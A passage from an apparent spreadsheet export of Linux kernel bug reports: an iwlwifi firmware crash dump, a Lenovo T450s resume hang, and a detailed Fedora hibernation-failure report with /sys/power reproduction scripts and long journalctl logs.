NMI_INTERRUPT_UNKNOWN [ 178.479907] iwlwifi 0000:02:00.0: 0x00000230 | uPc [ 178.480410] iwlwifi 0000:02:00.0: 0x00000000 | branchlink1 [ 178.480913] iwlwifi 0000:02:00.0: 0x00000B2E | branchlink2 [ 178.481340] iwlwifi 0000:02:00.0: 0x00014734 | interruptlink1 [ 178.481771] iwlwifi 0000:02:00.0: 0x00014734 | interruptlink2 [ 178.482227] iwlwifi 0000:02:00.0: 0x00000000 | data1 [ 178.482678] iwlwifi 0000:02:00.0: 0x00000080 | data2 [ 178.483210] iwlwifi 0000:02:00.0: 0x07030000 | data3 [ 178.483658] iwlwifi 0000:02:00.0: 0x00000000 | beacon time [ 178.484110] iwlwifi 0000:02:00.0: 0x0882F203 | tsf low [ 178.484528] iwlwifi 0000:02:00.0: 0x00000000 | tsf hi [ 178.484947] iwlwifi 0000:02:00.0: 0x00000000 | time gp1 [ 178.485395] iwlwifi 0000:02:00.0: 0x0882F204 | time gp2 [ 178.485845] iwlwifi 0000:02:00.0: 0x00000000 | time gp3 [ 178.486383] iwlwifi 0000:02:00.0: 0x0004191E | uCode version [ 178.486801] iwlwifi 0000:02:00.0: 0x00000164 | hw version [ 178.487226] iwlwifi 0000:02:00.0: 0x00489204 | board version [ 178.487651] iwlwifi 0000:02:00.0: 0x09B2002C | hcmd [ 178.488066] iwlwifi 0000:02:00.0: 0x24022000 | isr0 [ 178.488510] iwlwifi 0000:02:00.0: 0x01800000 | isr1 [ 178.488929] iwlwifi 0000:02:00.0: 0x00000002 | isr2 [ 178.489392] iwlwifi 0000:02:00.0: 0x0041FCC0 | isr3 [ 178.489899] iwlwifi 0000:02:00.0: 0x00000000 | isr4 [ 178.490346] iwlwifi 0000:02:00.0: 0x00000110 | isr_pref [ 178.490778] iwlwifi 0000:02:00.0: 0x00000000 | wait_event [ 178.491186] iwlwifi 0000:02:00.0: 0x00000080 | l2p_control [ 178.491612] iwlwifi 0000:02:00.0: 0x00010030 | l2p_duration [ 178.492005] iwlwifi 0000:02:00.0: 0x0000003F | l2p_mhvalid [ 178.492389] iwlwifi 0000:02:00.0: 0x00008000 | l2p_addr_match [ 178.492818] iwlwifi 0000:02:00.0: 0x00000005 | lmpm_pmg_sel [ 178.493291] iwlwifi 0000:02:00.0: 0x17061509 | timestamp [ 178.493726] iwlwifi 0000:02:00.0: 0x0034C0C8 | flow_handler [ 178.494103] ieee80211 phy0: Hardware restart was requested [ 178.614532] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 178.615512] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 178.717499] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 178.718114] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 202.415282] device wlp2s0mon left promiscuous mode I'm using Arch Linux, kernel version 4.1.6-1-ARCH, intel-ucode 20150121-1, linux-firmware 20150722.e10097a-1.</t>
  </si>
  <si>
    <t>System hangs on resume from hibernate. Black screen and hardware lockup upon resume. Hardware: Lenovo T450s</t>
  </si>
  <si>
    <t>2015-09-18 18:13 UTC</t>
  </si>
  <si>
    <t>Matt Schepers</t>
  </si>
  <si>
    <t>2016-08-01 03:26 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: Kernel does not 'hibernate' system or write memory image to /swap file during hibernate. [2.] Full description of the problem/report: When hibernating the system by using systemd 'systemctl hibernate' OR by setting kernel variables in '/sys/power' directly the kernel fails to complete the hibernate sequence and write the memory image to swap 30-60% of the time. Sometimes it is completely successful. Before each hibernate I have simulated hibernate successfully using the guide posted here: https://www.kernel.org/doc/Documentation/power/basic-pm-debugging.txt Upon wakeup there is something written to the swap file, but the machine is unable to resume from it. Logs indicate that the hibernate process does not complete and the image is not written successfully. Additional details provided in this bug report and output from journalctl. journalctl -xe -b -2 | grep 'habanero kernel\|CUSTOM' [3.] Keywords (i.e., modules, networking, kernel): power management, hibernate, kernel [4.] Kernel version (from /proc/version): Linux version 4.1.6-201.fc22.x86_64 (mockbuild@bkernel02.phx2.fedoraproject.org) (gcc version 5.1.1 20150618 (Red Hat 5.1.1-4) (GCC) ) #1 SMP Fri Sep 4 17:49:24 UTC 2015 [5.] Output of Oops.. message (if applicable) with symbolic information resolved (see Documentation/oops-tracing.txt) Attached. journalctl -xe -b -1 | grep 'habanero kernel\|CUSTOM' &gt; journalctl.output.txt [6.] A small shell script or example program which triggers the problem (if possible) Shell script 1 to reproduce this issue: #!/bin/bash logger 'CUSTOM: starting CORE pm_test' echo core &gt; /sys/power/pm_test echo shutdown &gt; /sys/power/disk echo disk &gt; /sys/power/state sleep 2 logger 'CUSTOM: disabling CORE pm_test' echo none &gt; /sys/power/pm_test logger 'CUSTOM: hibernate for real.' echo shutdown &gt; /sys/power/disk echo disk &gt; /sys/power/state Shell script 2 to reproduce this issue: #!/bin/bash systemctl hibernate [7.] Environment [7.1.] Software (add the output of the ver_linux script here) [7.2.] Processor information (from /proc/cpuinfo): Attached. [7.3.] Module information (from /proc/modules): Attached. [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) Attached. [7.5.] PCI information ('lspci -vvv' as root) [7.6.] SCSI information (from /proc/scsi/scsi) [7.7.] Other information that might be relevant to the problem (please look in /proc and include all information that you think to be relevant): [X.] Other notes, patches, fixes, workarounds: journalctl.output.txt***************************************************** Sep 18 10:54:12 habanero kernel: Bluetooth: HCI socket layer initialized Sep 18 10:54:12 habanero kernel: Bluetooth: L2CAP socket layer initialized Sep 18 10:54:12 habanero kernel: Bluetooth: SCO socket layer initialized Sep 18 10:54:12 habanero kernel: Bluetooth: BNEP (Ethernet Emulation) ver 1.3 Sep 18 10:54:12 habanero kernel: Bluetooth: BNEP filters: protocol multicast Sep 18 10:54:12 habanero kernel: Bluetooth: BNEP socket layer initialized Sep 18 10:54:31 habanero kernel: usb 1-6: reset full-speed USB device number 3 using xhci_hcd Sep 18 10:57:25 habanero kernel: PM: Hibernation mode set to 'shutdown' Sep 18 10:57:34 habanero kernel: PM: Syncing filesystems ... done. Sep 18 10:57:34 habanero kernel: Freezing user space processes ... (elapsed 0.001 seconds) done. Sep 18 10:57:34 habanero kernel: PM: Marking nosave pages: [mem 0x00000000-0x00000fff] Sep 18 10:57:34 habanero kernel: PM: Marking nosave pages: [mem 0x0009d000-0x000fffff] Sep 18 10:57:34 habanero kernel: PM: Marking nosave pages: [mem 0x10000000-0x1000afff] Sep 18 10:57:34 habanero kernel: PM: Marking nosave pages: [mem 0x90605000-0xffffffff] Sep 18 10:57:34 habanero kernel: PM: Basic memory bitmaps created Sep 18 10:57:34 habanero kernel: PM: Preallocating image memory... done (allocated 199060 pages) Sep 18 10:57:34 habanero kernel: PM: Allocated 796240 kbytes in 2.47 seconds (322.36 MB/s) Sep 18 10:57:34 habanero kernel: Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. Sep 18 10:57:34 habanero kernel: Suspending console(s) (use no_console_suspend to debug) Sep 18 10:57:34 habanero kernel: wlp3s0: deauthenticating from 54:a0:50:76:f4:70 by local choice (Reason: 3=DEAUTH_LEAVING) Sep 18 10:57:34 habanero kernel: PM: freeze of devices complete after 178.624 msecs Sep 18 10:57:34 habanero kernel: PM: late freeze of devices complete after 17.127 msecs Sep 18 10:57:34 habanero kernel: PM: noirq freeze of devices complete after 2.747 msecs Sep 18 10:57:34 habanero kernel: Disabling non-boot CPUs ... Sep 18 10:57:34 habanero kernel: intel_pstate CPU 1 exiting Sep 18 10:57:34 habanero kernel: kvm: disabling virtualization on CPU1 Sep 18 10:57:34 habanero kernel: smpboot: CPU 1 is now offline Sep 18 10:57:34 habanero kernel: intel_pstate CPU 2 exiting Sep 18 10:57:34 habanero kernel: kvm: disabling virtualization on CPU2 Sep 18 10:57:34 habanero kernel: smpboot: CPU 2 is now offline Sep 18 10:57:34 habanero kernel: intel_pstate CPU 3 exiting Sep 18 10:57:34 habanero kernel: kvm: disabling virtualization on CPU3 Sep 18 10:57:34 habanero kernel: smpboot: CPU 3 is now offline Sep 18 10:57:34 habanero kernel: hibernation debug: Waiting for 5 seconds. Sep 18 10:57:34 habanero kernel: Enabling non-boot CPUs ... Sep 18 10:57:34 habanero kernel: x86: Booting SMP configuration: Sep 18 10:57:34 habanero kernel: smpboot: Booting Node 0 Processor 1 APIC 0x1 Sep 18 10:57:34 habanero kernel: kvm: enabling virtualization on CPU1 Sep 18 10:57:34 habanero kernel: cache: parent cpu1 should not be sleeping Sep 18 10:57:34 habanero kernel: CPU1 is up Sep 18 10:57:34 habanero kernel: smpboot: Booting Node 0 Processor 2 APIC 0x2 Sep 18 10:57:34 habanero kernel: kvm: enabling virtualization on CPU2 Sep 18 10:57:34 habanero kernel: cache: parent cpu2 should not be sleeping Sep 18 10:57:34 habanero kernel: CPU2 is up Sep 18 10:57:34 habanero kernel: smpboot: Booting Node 0 Processor 3 APIC 0x3 Sep 18 10:57:34 habanero kernel: kvm: enabling virtualization on CPU3 Sep 18 10:57:34 habanero kernel: cache: parent cpu3 should not be sleeping Sep 18 10:57:34 habanero kernel: CPU3 is up Sep 18 10:57:34 habanero kernel: PM: noirq restore of devices complete after 11.323 msecs Sep 18 10:57:34 habanero kernel: PM: early restore of devices complete after 10.475 msecs Sep 18 10:57:34 habanero kernel: usb usb1: root hub lost power or was reset Sep 18 10:57:34 habanero kernel: usb usb2: root hub lost power or was reset Sep 18 10:57:34 habanero kernel: usb usb3: root hub lost power or was reset Sep 18 10:57:34 habanero kernel: sd 0:0:0:0: [sda] Starting disk Sep 18 10:57:34 habanero kernel: sd 2:0:0:0: [sdb] Starting disk Sep 18 10:57:34 habanero kernel: rtc_cmos 00:02: System wakeup disabled by ACPI Sep 18 10:57:34 habanero kernel: ehci-pci 0000:00:1d.0: cache line size of 64 is not supported Sep 18 10:57:34 habanero kernel: ata3: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:57:34 habanero kernel: ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: usb 3-1: reset high-speed USB device number 2 using ehci-pci Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:57:34 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata3.00: configured for UDMA/133 Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:57:34 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:57:34 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:57:34 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:57:34 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:57:34 habanero kernel: ata1.00: configured for UDMA/133 Sep 18 10:57:34 habanero kernel: usb 1-1: reset full-speed USB device number 2 using xhci_hcd Sep 18 10:57:34 habanero kernel: usb 1-6: reset full-speed USB device number 3 using xhci_hcd Sep 18 10:57:34 habanero kernel: psmouse serio1: synaptics: queried max coordinates: x [..5676], y [..4758] Sep 18 10:57:34 habanero kernel: psmouse serio1: synaptics: queried min coordinates: x [1266..], y [1096..] Sep 18 10:57:34 habanero kernel: usb 1-8: reset high-speed USB device number 4 using xhci_hcd Sep 18 10:57:34 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:57:34 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:57:34 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:57:34 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:57:34 habanero kernel: PM: restore of devices complete after 1297.148 msecs Sep 18 10:57:34 habanero kernel: PM: Image restored successfully. Sep 18 10:57:34 habanero kernel: PM: Basic memory bitmaps freed Sep 18 10:57:34 habanero kernel: Restarting tasks ... done. Sep 18 10:57:36 habanero kernel: PM: Hibernation mode set to 'shutdown' Sep 18 10:58:06 habanero kernel: PM: Syncing filesystems ... done. Sep 18 10:58:06 habanero kernel: Freezing user space processes ... (elapsed 0.001 seconds) done. Sep 18 10:58:06 habanero kernel: PM: Marking nosave pages: [mem 0x00000000-0x00000fff] Sep 18 10:58:06 habanero kernel: PM: Marking nosave pages: [mem 0x0009d000-0x000fffff] Sep 18 10:58:06 habanero kernel: PM: Marking nosave pages: [mem 0x10000000-0x1000afff] Sep 18 10:58:06 habanero kernel: PM: Marking nosave pages: [mem 0x90605000-0xffffffff] Sep 18 10:58:06 habanero kernel: PM: Basic memory bitmaps created Sep 18 10:58:06 habanero kernel: PM: Preallocating image memory... done (allocated 194457 pages) Sep 18 10:58:06 habanero kernel: PM: Allocated 777828 kbytes in 1.15 seconds (676.37 MB/s) Sep 18 10:58:06 habanero kernel: Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. Sep 18 10:58:06 habanero kernel: Suspending console(s) (use no_console_suspend to debug) Sep 18 10:58:06 habanero kernel: queueing ieee80211 work while going to suspend Sep 18 10:58:06 habanero kernel: PM: freeze of devices complete after 141.462 msecs Sep 18 10:58:06 habanero kernel: PM: late freeze of devices complete after 17.076 msecs Sep 18 10:58:06 habanero kernel: PM: noirq freeze of devices complete after 2.740 msecs Sep 18 10:58:06 habanero kernel: Disabling non-boot CPUs ... Sep 18 10:58:06 habanero kernel: intel_pstate CPU 1 exiting Sep 18 10:58:06 habanero kernel: kvm: disabling virtualization on CPU1 Sep 18 10:58:06 habanero kernel: smpboot: CPU 1 is now offline Sep 18 10:58:06 habanero kernel: intel_pstate CPU 2 exiting Sep 18 10:58:06 habanero kernel: kvm: disabling virtualization on CPU2 Sep 18 10:58:06 habanero kernel: smpboot: CPU 2 is now offline Sep 18 10:58:06 habanero kernel: intel_pstate CPU 3 exiting Sep 18 10:58:06 habanero kernel: kvm: disabling virtualization on CPU3 Sep 18 10:58:06 habanero kernel: smpboot: CPU 3 is now offline Sep 18 10:58:06 habanero kernel: PM: Creating hibernation image: Sep 18 10:58:06 habanero kernel: PM: Need to copy 194312 pages Sep 18 10:58:06 habanero kernel: PM: Normal pages needed: 194312 + 1024, available pages: 2878888 Sep 18 10:58:06 habanero kernel: Enabling non-boot CPUs ... Sep 18 10:58:06 habanero kernel: x86: Booting SMP configuration: Sep 18 10:58:06 habanero kernel: smpboot: Booting Node 0 Processor 1 APIC 0x1 Sep 18 10:58:06 habanero kernel: kvm: enabling virtualization on CPU1 Sep 18 10:58:06 habanero kernel: cache: parent cpu1 should not be sleeping Sep 18 10:58:06 habanero kernel: CPU1 is up Sep 18 10:58:06 habanero kernel: smpboot: Booting Node 0 Processor 2 APIC 0x2 Sep 18 10:58:06 habanero kernel: kvm: enabling virtualization on CPU2 Sep 18 10:58:06 habanero kernel: cache: parent cpu2 should not be sleeping Sep 18 10:58:06 habanero kernel: CPU2 is up Sep 18 10:58:06 habanero kernel: smpboot: Booting Node 0 Processor 3 APIC 0x3 Sep 18 10:58:06 habanero kernel: kvm: enabling virtualization on CPU3 Sep 18 10:58:06 habanero kernel: cache: parent cpu3 should not be sleeping Sep 18 10:58:06 habanero kernel: CPU3 is up Sep 18 10:58:06 habanero kernel: PM: noirq restore of devices complete after 11.706 msecs Sep 18 10:58:06 habanero kernel: PM: early restore of devices complete after 10.418 msecs Sep 18 10:58:06 habanero kernel: usb usb1: root hub lost power or was reset Sep 18 10:58:06 habanero kernel: usb usb2: root hub lost power or was reset Sep 18 10:58:06 habanero kernel: usb usb3: root hub lost power or was reset Sep 18 10:58:06 habanero kernel: rtc_cmos 00:02: System wakeup disabled by ACPI Sep 18 10:58:06 habanero kernel: sd 0:0:0:0: [sda] Starting disk Sep 18 10:58:06 habanero kernel: sd 2:0:0:0: [sdb] Starting disk Sep 18 10:58:06 habanero kernel: ehci-pci 0000:00:1d.0: cache line size of 64 is not supported Sep 18 10:58:06 habanero kernel: ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:58:06 habanero kernel: ata3: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:58:06 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata3.00: configured for UDMA/133 Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:58:06 habanero kernel: usb 3-1: reset high-speed USB device number 2 using ehci-pci Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:58:06 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:58:06 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:58:06 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:58:06 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:58:06 habanero kernel: ata1.00: configured for UDMA/133 Sep 18 10:58:06 habanero kernel: usb 1-1: reset full-speed USB device number 2 using xhci_hcd Sep 18 10:58:06 habanero kernel: usb 1-8: reset high-speed USB device number 4 using xhci_hcd Sep 18 10:58:06 habanero kernel: psmouse serio1: synaptics: queried max coordinates: x [..5676], y [..4758] Sep 18 10:58:06 habanero kernel: psmouse serio1: synaptics: queried min coordinates: x [1266..], y [1096..] Sep 18 10:58:06 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:58:06 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:58:06 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:58:06 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:58:06 habanero kernel: usb 1-6: reset full-speed USB device number 3 using xhci_hcd Sep 18 10:58:06 habanero kernel: PM: restore of devices complete after 1166.456 msecs Sep 18 10:58:06 habanero kernel: PM: Image restored successfully. Sep 18 10:58:06 habanero kernel: PM: Basic memory bitmaps freed Sep 18 10:58:06 habanero kernel: Restarting tasks ... done. Sep 18 10:58:14 habanero kernel: wlp3s0: authenticate with 54:a0:50:76:f4:70 Sep 18 10:58:14 habanero kernel: wlp3s0: send auth to 54:a0:50:76:f4:70 (try 1/3) Sep 18 10:58:14 habanero kernel: wlp3s0: authenticated Sep 18 10:58:14 habanero kernel: wlp3s0: associate with 54:a0:50:76:f4:70 (try 1/3) Sep 18 10:58:14 habanero kernel: wlp3s0: RX AssocResp from 54:a0:50:76:f4:70 (capab=0x411 status=0 aid=1) Sep 18 10:58:14 habanero kernel: wlp3s0: associated Sep 18 10:58:30 habanero kernel: capability: warning: `VirtualBox' uses 32-bit capabilities (legacy support in use) Sep 18 10:59:44 habanero kernel: PM: Hibernation mode set to 'shutdown' Sep 18 10:59:57 habanero kernel: PM: Syncing filesystems ... done. Sep 18 10:59:57 habanero kernel: Freezing user space processes ... (elapsed 0.001 seconds) done. Sep 18 10:59:57 habanero kernel: PM: Marking nosave pages: [mem 0x00000000-0x00000fff] Sep 18 10:59:57 habanero kernel: PM: Marking nosave pages: [mem 0x0009d000-0x000fffff] Sep 18 10:59:57 habanero kernel: PM: Marking nosave pages: [mem 0x10000000-0x1000afff] Sep 18 10:59:57 habanero kernel: PM: Marking nosave pages: [mem 0x90605000-0xffffffff] Sep 18 10:59:57 habanero kernel: PM: Basic memory bitmaps created Sep 18 10:59:57 habanero kernel: PM: Preallocating image memory... done (allocated 296704 pages) Sep 18 10:59:57 habanero kernel: PM: Allocated 1186816 kbytes in 5.39 seconds (220.18 MB/s) Sep 18 10:59:57 habanero kernel: Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. Sep 18 10:59:57 habanero kernel: Suspending console(s) (use no_console_suspend to debug) Sep 18 10:59:57 habanero kernel: wlp3s0: deauthenticating from 54:a0:50:76:f4:70 by local choice (Reason: 3=DEAUTH_LEAVING) Sep 18 10:59:57 habanero kernel: PM: freeze of devices complete after 159.412 msecs Sep 18 10:59:57 habanero kernel: PM: late freeze of devices complete after 17.235 msecs Sep 18 10:59:57 habanero kernel: PM: noirq freeze of devices complete after 2.609 msecs Sep 18 10:59:57 habanero kernel: Disabling non-boot CPUs ... Sep 18 10:59:57 habanero kernel: intel_pstate CPU 1 exiting Sep 18 10:59:57 habanero kernel: kvm: disabling virtualization on CPU1 Sep 18 10:59:57 habanero kernel: smpboot: CPU 1 is now offline Sep 18 10:59:57 habanero kernel: intel_pstate CPU 2 exiting Sep 18 10:59:57 habanero kernel: kvm: disabling virtualization on CPU2 Sep 18 10:59:57 habanero kernel: smpboot: CPU 2 is now offline Sep 18 10:59:57 habanero kernel: intel_pstate CPU 3 exiting Sep 18 10:59:57 habanero kernel: kvm: disabling virtualization on CPU3 Sep 18 10:59:57 habanero kernel: smpboot: CPU 3 is now offline Sep 18 10:59:57 habanero kernel: hibernation debug: Waiting for 5 seconds. Sep 18 10:59:57 habanero kernel: Enabling non-boot CPUs ... Sep 18 10:59:57 habanero kernel: x86: Booting SMP configuration: Sep 18 10:59:57 habanero kernel: smpboot: Booting Node 0 Processor 1 APIC 0x1 Sep 18 10:59:57 habanero kernel: kvm: enabling virtualization on CPU1 Sep 18 10:59:57 habanero kernel: cache: parent cpu1 should not be sleeping Sep 18 10:59:57 habanero kernel: CPU1 is up Sep 18 10:59:57 habanero kernel: smpboot: Booting Node 0 Processor 2 APIC 0x2 Sep 18 10:59:57 habanero kernel: kvm: enabling virtualization on CPU2 Sep 18 10:59:57 habanero kernel: cache: parent cpu2 should not be sleeping Sep 18 10:59:57 habanero kernel: CPU2 is up Sep 18 10:59:57 habanero kernel: smpboot: Booting Node 0 Processor 3 APIC 0x3 Sep 18 10:59:57 habanero kernel: kvm: enabling virtualization on CPU3 Sep 18 10:59:57 habanero kernel: cache: parent cpu3 should not be sleeping Sep 18 10:59:57 habanero kernel: CPU3 is up Sep 18 10:59:57 habanero kernel: PM: noirq restore of devices complete after 11.159 msecs Sep 18 10:59:57 habanero kernel: PM: early restore of devices complete after 10.191 msecs Sep 18 10:59:57 habanero kernel: usb usb1: root hub lost power or was reset Sep 18 10:59:57 habanero kernel: usb usb2: root hub lost power or was reset Sep 18 10:59:57 habanero kernel: usb usb3: root hub lost power or was reset Sep 18 10:59:57 habanero kernel: rtc_cmos 00:02: System wakeup disabled by ACPI Sep 18 10:59:57 habanero kernel: sd 0:0:0:0: [sda] Starting disk Sep 18 10:59:57 habanero kernel: sd 2:0:0:0: [sdb] Starting disk Sep 18 10:59:57 habanero kernel: ehci-pci 0000:00:1d.0: cache line size of 64 is not supported Sep 18 10:59:57 habanero kernel: ata3: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:59:57 habanero kernel: ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:59:57 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata3.00: configured for UDMA/133 Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:59:57 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:59:57 habanero kernel: usb 3-1: reset high-speed USB device number 2 using ehci-pci Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 10:59:57 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 10:59:57 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 10:59:57 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 10:59:57 habanero kernel: ata1.00: configured for UDMA/133 Sep 18 10:59:57 habanero kernel: usb 1-1: reset full-speed USB device number 2 using xhci_hcd Sep 18 10:59:57 habanero kernel: usb 1-8: reset high-speed USB device number 4 using xhci_hcd Sep 18 10:59:57 habanero kernel: psmouse serio1: synaptics: queried max coordinates: x [..5676], y [..4758] Sep 18 10:59:57 habanero kernel: psmouse serio1: synaptics: queried min coordinates: x [1266..], y [1096..] Sep 18 10:59:57 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:59:57 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:59:57 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:59:57 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 10:59:57 habanero kernel: usb 1-6: reset full-speed USB device number 3 using xhci_hcd Sep 18 10:59:57 habanero kernel: PM: restore of devices complete after 1167.181 msecs Sep 18 10:59:57 habanero kernel: PM: Image restored successfully. Sep 18 10:59:57 habanero kernel: PM: Basic memory bitmaps freed Sep 18 10:59:57 habanero kernel: Restarting tasks ... done. Sep 18 10:59:59 habanero kernel: PM: Hibernation mode set to 'shutdown' Sep 18 11:00:33 habanero kernel: PM: Syncing filesystems ... done. Sep 18 11:00:33 habanero kernel: Freezing user space processes ... (elapsed 0.001 seconds) done. Sep 18 11:00:33 habanero kernel: PM: Marking nosave pages: [mem 0x00000000-0x00000fff] Sep 18 11:00:33 habanero kernel: PM: Marking nosave pages: [mem 0x0009d000-0x000fffff] Sep 18 11:00:33 habanero kernel: PM: Marking nosave pages: [mem 0x10000000-0x1000afff] Sep 18 11:00:33 habanero kernel: PM: Marking nosave pages: [mem 0x90605000-0xffffffff] Sep 18 11:00:33 habanero kernel: PM: Basic memory bitmaps created Sep 18 11:00:33 habanero kernel: PM: Preallocating image memory... done (allocated 304251 pages) Sep 18 11:00:33 habanero kernel: PM: Allocated 1217004 kbytes in 1.36 seconds (894.85 MB/s) Sep 18 11:00:33 habanero kernel: Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. Sep 18 11:00:33 habanero kernel: Suspending console(s) (use no_console_suspend to debug) Sep 18 11:00:33 habanero kernel: PM: freeze of devices complete after 156.475 msecs Sep 18 11:00:33 habanero kernel: PM: late freeze of devices complete after 17.392 msecs Sep 18 11:00:33 habanero kernel: PM: noirq freeze of devices complete after 2.626 msecs 